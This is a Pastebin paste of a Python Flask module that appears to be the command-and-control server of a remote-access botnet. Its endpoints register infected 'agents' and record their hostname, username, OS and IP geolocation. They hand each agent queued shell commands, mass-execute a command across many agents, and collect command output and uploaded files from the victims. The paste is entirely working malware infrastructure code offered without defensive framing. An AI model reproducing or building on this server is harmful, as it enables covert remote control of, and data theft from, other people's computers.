FlyFar

server/api/__init__.py

Jan 13th, 2024
132
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 4.10 KB | Cybersecurity | 0 0
  1. import json
  2. import base64
  3. import os
  4. from datetime import datetime
  5. import tempfile
  6. import shutil
  7.  
  8. from flask import Blueprint
  9. from flask import request
  10. from flask import abort
  11. from flask import current_app
  12. from flask import url_for
  13. from flask import send_file
  14. from flask import render_template
  15. from werkzeug.utils import secure_filename
  16. import pygeoip
  17. from flask import flash
  18. from flask import redirect
  19. from flask import escape
  20. import cgi
  21.  
  22. from webui import require_admin
  23. from models import db
  24. from models import Agent
  25. from models import Command
  26.  
  27.  
  28. api = Blueprint('api', __name__)
  29. GEOIP = pygeoip.GeoIP('api/GeoIP.dat', pygeoip.MEMORY_CACHE)
  30.  
  31.  
  32. def geolocation(ip):
  33.     geoloc_str = 'Local'
  34.     info = GEOIP.record_by_addr(ip)
  35.     if info:
  36.         geoloc_str = info['city'] + ' [' + info['country_code'] + ']'
  37.     return geoloc_str
  38.  
  39.  
  40. @api.route('/massexec', methods=['POST'])
  41. @require_admin
  42. def mass_execute():
  43.     selection = request.form.getlist('selection')
  44.     if 'execute' in request.form:
  45.         for agent_id in selection:
  46.             Agent.query.get(agent_id).push_command(request.form['cmd'])
  47.         flash('Executed "%s" on %s agents' % (request.form['cmd'], len(selection)))
  48.     elif 'delete' in request.form:
  49.         for agent_id in selection:
  50.             db.session.delete(Agent.query.get(agent_id))
  51.         db.session.commit()
  52.         flash('Deleted %s agents' % len(selection))
  53.     return redirect(url_for('webui.agent_list'))
  54.  
  55.  
  56. @api.route('/<agent_id>/push', methods=['POST'])
  57. @require_admin
  58. def push_command(agent_id):
  59.     agent = Agent.query.get(agent_id)
  60.     if not agent:
  61.         abort(404)
  62.     agent.push_command(request.form['cmdline'])
  63.     return ''
  64.  
  65.  
  66. @api.route('/<agent_id>/stdout')
  67. @require_admin
  68. def agent_console(agent_id):
  69.     agent = Agent.query.get(agent_id)
  70.     return render_template('agent_console.html', agent=agent)
  71.  
  72.  
  73. @api.route('/<agent_id>/hello', methods=['POST'])
  74. def get_command(agent_id):
  75.     agent = Agent.query.get(agent_id)
  76.     if not agent:
  77.         agent = Agent(agent_id)
  78.         db.session.add(agent)
  79.         db.session.commit()
  80.     # Report basic info about the agent
  81.     info = request.json
  82.     if info:
  83.         if 'platform' in info:
  84.             agent.operating_system = info['platform']
  85.         if 'hostname' in info:
  86.             agent.hostname = info['hostname']
  87.         if 'username' in info:
  88.             agent.username = info['username']
  89.     agent.last_online = datetime.now()
  90.     agent.remote_ip = request.remote_addr
  91.     agent.geolocation = geolocation(agent.remote_ip)
  92.     db.session.commit()
  93.     # Return pending commands for the agent
  94.     cmd_to_run = ''
  95.     cmd = agent.commands.order_by(Command.timestamp.desc()).first()
  96.     if cmd:
  97.         cmd_to_run = cmd.cmdline
  98.         db.session.delete(cmd)
  99.         db.session.commit()
  100.     return cmd_to_run
  101.  
  102.  
  103. @api.route('/<agent_id>/report', methods=['POST'])
  104. def report_command(agent_id):
  105.     agent = Agent.query.get(agent_id)
  106.     if not agent:
  107.         abort(404)
  108.     out = request.form['output']
  109.     agent.output += cgi.escape(out)
  110.     db.session.add(agent)
  111.     db.session.commit()
  112.     return ''
  113.  
  114.  
  115. @api.route('/<agent_id>/upload', methods=['POST'])
  116. def upload(agent_id):
  117.     agent = Agent.query.get(agent_id)
  118.     if not agent:
  119.         abort(404)
  120.     for file in request.files.values():
  121.         upload_dir = os.path.join(current_app.config['UPLOAD_FOLDER'])
  122.         agent_dir = agent_id
  123.         store_dir = os.path.join(upload_dir, agent_dir)
  124.         filename = secure_filename(file.filename)
  125.         if not os.path.exists(store_dir):
  126.             os.makedirs(store_dir)
  127.         file_path = os.path.join(store_dir, filename)
  128.         while os.path.exists(file_path):
  129.             filename = "_" + filename
  130.             file_path = os.path.join(store_dir, filename)
  131.         file.save(file_path)
  132.         download_link = url_for('webui.uploads', path=agent_dir + '/' + filename)
  133.         agent.output += '[*] File uploaded: <a target="_blank" href="' + download_link + '">' + download_link + '</a>\n'
  134.         db.session.add(agent)
  135.         db.session.commit()
  136.     return ''
Add Comment
Please, Sign In to add comment